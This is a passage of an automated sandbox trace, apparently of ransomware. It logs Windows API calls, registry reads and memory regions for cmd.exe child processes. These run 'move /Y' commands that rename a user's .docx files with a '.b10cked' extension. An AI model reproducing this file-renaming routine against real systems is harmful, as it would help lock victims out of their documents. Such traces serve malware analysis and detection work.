lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC", nBufferLength=0x104, lpBuffer=0x16f2e8, lpFilePart=0x16f080 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC", lpFilePart=0x16f080*="2VGMMR~1.DOC") returned 0x26 [0136.634] SetErrorMode (uMode=0x0) returned 0x1 [0136.634] SetErrorMode (uMode=0x0) returned 0x0 [0136.634] SetErrorMode (uMode=0x1) returned 0x0 [0136.634] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked", nBufferLength=0x104, lpBuffer=0x16f4f0, lpFilePart=0x16f080 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked", lpFilePart=0x16f080*="2VgMmRhPzB7.docx.b10cked") returned 0x32 [0136.634] SetErrorMode (uMode=0x0) returned 0x1 [0136.634] SetLastError (dwErrCode=0x0) [0136.634] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2vgmmrhpzb7.docx.b10cked")) returned 0xffffffff [0136.634] GetLastError () returned 0x2 [0136.634] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x16e9fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e9fc) returned 0x230f08 [0136.634] FindNextFileW (in: hFindFile=0x230f08, lpFindFileData=0x16e9fc | out: lpFindFileData=0x16e9fc) returned 0 [0136.635] GetLastError () returned 0x12 [0136.635] FindClose (in: hFindFile=0x230f08 | out: hFindFile=0x230f08) returned 1 [0136.636] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x241ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x241ae0) returned 0x230f08 [0136.636] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked", nBufferLength=0x104, lpBuffer=0x16ec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked", lpFilePart=0x0) returned 0x32 [0136.636] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx", nBufferLength=0x104, lpBuffer=0x16ec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx", lpFilePart=0x0) returned 0x2a [0136.636] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\2vgmmrhpzb7.docx")) returned 0x20 [0136.636] 
MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\2vgmmrhpzb7.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2vgmmrhpzb7.docx.b10cked"), dwFlags=0x3) returned 1 [0136.637] FindClose (in: hFindFile=0x230f08 | out: hFindFile=0x230f08) returned 1 [0136.637] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ec48 | out: _Buffer=" 1") returned 9 [0136.637] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.637] GetFileType (hFile=0x7) returned 0x2 [0136.637] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.637] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ebd4 | out: lpMode=0x16ebd4) returned 1 [0136.704] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.704] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ec08 | out: lpConsoleScreenBufferInfo=0x16ec08) returned 1 [0136.704] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.704] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16ec48 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0136.704] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16ec2c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16ec2c*=0x1a) returned 1 [0136.705] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.705] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.705] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.705] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.705] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.705] 
GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.705] SetConsoleInputExeNameW () returned 0x1 [0136.705] GetConsoleOutputCP () returned 0x1b5 [0136.705] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.705] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.705] exit (_Code=0) Process: id = "136" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16660" os_pid = "0xc1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13595 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13596 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13597 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13598 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13599 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename 
= "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13600 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13601 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13602 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13603 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 13604 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13989 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13990 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13991 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 13992 start_va = 0x2d0000 end_va = 0x336fff entry_point = 0x2d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13993 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 13994 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = 
"\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13995 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13996 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13997 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13998 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13999 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14000 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14001 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14002 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14087 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" 
Region: id = 14088 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14089 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14090 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 14091 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 14092 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 14093 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 14094 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 14095 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 14096 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Thread: id = 193 os_tid = 0xc28 [0136.260] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf8fc | out: lpSystemTimeAsFileTime=0x2cf8fc*(dwLowDateTime=0x8b27c0e0, dwHighDateTime=0x1d440a9)) [0136.260] GetCurrentProcessId () returned 0xc1c [0136.260] GetCurrentThreadId () returned 0xc28 [0136.260] GetTickCount () returned 0x2b135 [0136.260] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf8f4 | out: lpPerformanceCount=0x2cf8f4*=19304956544) returned 1 [0136.261] 
GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.261] __set_app_type (_Type=0x1) [0136.261] __p__fmode () returned 0x76b331f4 [0136.261] __p__commode () returned 0x76b331fc [0136.261] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.261] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.262] GetCurrentThreadId () returned 0xc28 [0136.262] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc28) returned 0x38 [0136.262] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.262] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.262] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.321] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.321] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf88c | out: phkResult=0x2cf88c*=0x0) returned 0x2 [0136.322] VirtualQuery (in: lpAddress=0x2cf8c3, lpBuffer=0x2cf85c, dwLength=0x1c | out: lpBuffer=0x2cf85c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf85c, dwLength=0x1c | out: lpBuffer=0x2cf85c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf85c, dwLength=0x1c | out: lpBuffer=0x2cf85c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x1d3000, 
lpBuffer=0x2cf85c, dwLength=0x1c | out: lpBuffer=0x2cf85c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf85c, dwLength=0x1c | out: lpBuffer=0x2cf85c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.322] GetConsoleOutputCP () returned 0x1b5 [0136.325] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.325] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.325] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.325] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.329] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.330] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.330] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.332] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.332] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.333] GetEnvironmentStringsW () returned 0xc0168* [0136.334] FreeEnvironmentStringsW (penv=0xc0168) returned 1 [0136.334] GetEnvironmentStringsW () returned 0xc0168* [0136.334] FreeEnvironmentStringsW (penv=0xc0168) returned 1 [0136.334] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7fc | out: phkResult=0x2ce7fc*=0x40) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x0, 
lpData=0x2ce808*=0x90, lpcbData=0x2ce800*=0x1000) returned 0x2 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x1, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x0, lpData=0x2ce808*=0x1, lpcbData=0x2ce800*=0x1000) returned 0x2 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x0, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x40, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x40, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x0, lpData=0x2ce808*=0x40, lpcbData=0x2ce800*=0x1000) returned 0x2 [0136.334] RegCloseKey (hKey=0x40) returned 0x0 [0136.334] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7fc | out: phkResult=0x2ce7fc*=0x40) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x0, lpData=0x2ce808*=0x40, lpcbData=0x2ce800*=0x1000) returned 0x2 
[0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x1, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x0, lpData=0x2ce808*=0x1, lpcbData=0x2ce800*=0x1000) returned 0x2 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x0, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.335] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x9, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.335] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x9, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.335] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x0, lpData=0x2ce808*=0x9, lpcbData=0x2ce800*=0x1000) returned 0x2 [0136.335] RegCloseKey (hKey=0x40) returned 0x0 [0136.335] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.335] srand (_Seed=0x5b88636a) [0136.335] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked\"" [0136.335] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked\"" [0136.335] 
GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.335] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xc18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.335] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.336] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.336] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.336] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.336] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.336] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.336] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.336] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.336] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.336] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.336] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.336] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.336] GetEnvironmentStringsW () returned 0xc22b8* [0136.336] FreeEnvironmentStringsW (penv=0xc22b8) returned 1 [0136.336] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.336] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.336] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.336] 
_wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.336] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.336] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.336] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.336] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.336] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.336] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.336] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf5c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.337] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf5c8, lpFilePart=0x2cf5c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf5c4*="Desktop") returned 0x18 [0136.337] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.337] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf344 | out: lpFindFileData=0x2cf344) returned 0xbfff8 [0136.337] FindClose (in: hFindFile=0xbfff8 | out: hFindFile=0xbfff8) returned 1 [0136.337] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf344 | out: lpFindFileData=0x2cf344) returned 0xbfff8 [0136.337] FindClose (in: hFindFile=0xbfff8 | out: hFindFile=0xbfff8) returned 1 [0136.337] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf344 | out: lpFindFileData=0x2cf344) returned 0xbfff8 [0136.337] FindClose (in: hFindFile=0xbfff8 | out: hFindFile=0xbfff8) returned 1 [0136.338] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.338] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.338] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") 
returned 1 [0136.338] GetEnvironmentStringsW () returned 0xc2ad8* [0136.338] FreeEnvironmentStringsW (penv=0xc2ad8) returned 1 [0136.338] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.338] GetConsoleOutputCP () returned 0x1b5 [0136.368] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.368] GetUserDefaultLCID () returned 0x409 [0136.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf708, cchData=128 | out: lpLCData="0") returned 2 [0136.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf708, cchData=128 | out: lpLCData="0") returned 2 [0136.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf708, cchData=128 | out: lpLCData="1") returned 2 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: 